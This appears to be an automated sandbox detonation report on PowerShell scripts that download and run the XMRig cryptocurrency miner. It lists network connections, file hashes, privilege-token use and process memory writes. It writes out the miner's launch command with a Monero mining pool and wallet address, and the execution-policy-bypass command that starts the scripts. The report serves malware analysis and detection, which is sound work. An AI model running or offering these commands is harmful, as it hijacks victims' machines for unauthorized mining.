C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
memory/5064-0-0x00007FFA49493000-0x00007FFA49495000-memory.dmp
memory/5064-9-0x00007FFA49490000-0x00007FFA49F52000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_id1u1z21.k41.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5064-10-0x0000022346EF0000-0x0000022346F12000-memory.dmp
memory/5064-11-0x00007FFA49490000-0x00007FFA49F52000-memory.dmp
memory/5064-12-0x00007FFA49490000-0x00007FFA49F52000-memory.dmp
memory/5064-13-0x00007FFA49493000-0x00007FFA49495000-memory.dmp
memory/5064-14-0x00007FFA49490000-0x00007FFA49F52000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:07
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3376 wrote to memory of 4380 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3376 wrote to memory of 4380 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.179.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
Files
memory/3376-0-0x00007FF840123000-0x00007FF840124000-memory.dmp
memory/3376-5-0x0000025411240000-0x0000025411262000-memory.dmp
memory/3376-6-0x00007FF840120000-0x00007FF840B0C000-memory.dmp
memory/3376-9-0x00007FF840120000-0x00007FF840B0C000-memory.dmp
memory/3376-10-0x00000254299F0000-0x0000025429A66000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hpiy4bqc.les.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3376-25-0x00007FF840120000-0x00007FF840B0C000-memory.dmp
memory/3376-48-0x0000025429B90000-0x0000025429BA2000-memory.dmp
memory/3376-61-0x0000025429760000-0x000002542976A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4380-90-0x000001A5500E0000-0x000001A550100000-memory.dmp
memory/4380-91-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/3376-93-0x00007FF840123000-0x00007FF840124000-memory.dmp
memory/3376-94-0x00007FF840120000-0x00007FF840B0C000-memory.dmp
memory/4380-92-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/3376-95-0x00007FF840120000-0x00007FF840B0C000-memory.dmp
memory/3376-96-0x00007FF840120000-0x00007FF840B0C000-memory.dmp
memory/4380-97-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-98-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-99-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-100-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-101-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-102-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-103-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-104-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-105-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-106-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-107-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-108-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-109-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-110-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-111-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-112-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-113-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-114-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-115-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-116-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-117-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-118-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-119-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-120-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-121-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-122-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-123-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-124-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-125-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-126-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-127-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-128-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-129-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-130-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-131-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-132-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-133-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-134-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-135-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-136-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-137-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-138-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-139-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-140-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-141-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-142-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-143-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-144-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-145-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-146-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-147-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-148-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-149-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-150-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-151-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-152-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-153-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-154-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-155-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-156-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
memory/4380-157-0x00007FF68EA50000-0x00007FF68F683000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:08
Platform
win10-20240404-en
Max time kernel
1790s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2836 wrote to memory of 2352 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2836 wrote to memory of 2352 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.65.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
memory/2836-3-0x00007FFB570B3000-0x00007FFB570B4000-memory.dmp
memory/2836-5-0x0000018FEC690000-0x0000018FEC6B2000-memory.dmp
memory/2836-8-0x00007FFB570B0000-0x00007FFB57A9C000-memory.dmp
memory/2836-9-0x0000018FEC890000-0x0000018FEC906000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rp2ujln0.zhu.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2836-10-0x00007FFB570B0000-0x00007FFB57A9C000-memory.dmp
memory/2836-25-0x00007FFB570B0000-0x00007FFB57A9C000-memory.dmp
memory/2836-48-0x0000018FEC840000-0x0000018FEC852000-memory.dmp
memory/2836-61-0x0000018FEC820000-0x0000018FEC82A000-memory.dmp
memory/2836-83-0x00007FFB570B3000-0x00007FFB570B4000-memory.dmp
memory/2836-89-0x00007FFB570B0000-0x00007FFB57A9C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2352-92-0x000001F42DBB0000-0x000001F42DBD0000-memory.dmp
memory/2352-93-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2836-94-0x00007FFB570B0000-0x00007FFB57A9C000-memory.dmp
memory/2352-95-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-96-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-97-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-98-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-99-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-100-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-101-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-102-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-103-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-104-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-105-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-106-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-107-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-108-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-109-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-110-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-111-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-112-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-113-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-114-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-115-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-116-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-117-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-118-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-119-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-120-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-121-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-122-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-123-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-124-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-125-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-126-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-127-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-128-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-129-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-130-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-131-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-132-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-133-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-134-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-135-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-136-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-137-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-138-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-139-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-140-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-141-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-142-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-143-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-144-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-145-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-146-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-147-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-148-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-149-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-150-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-151-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-152-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-153-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-154-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-155-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
memory/2352-156-0x00007FF66F4C0000-0x00007FF6700F3000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:12
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1773s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
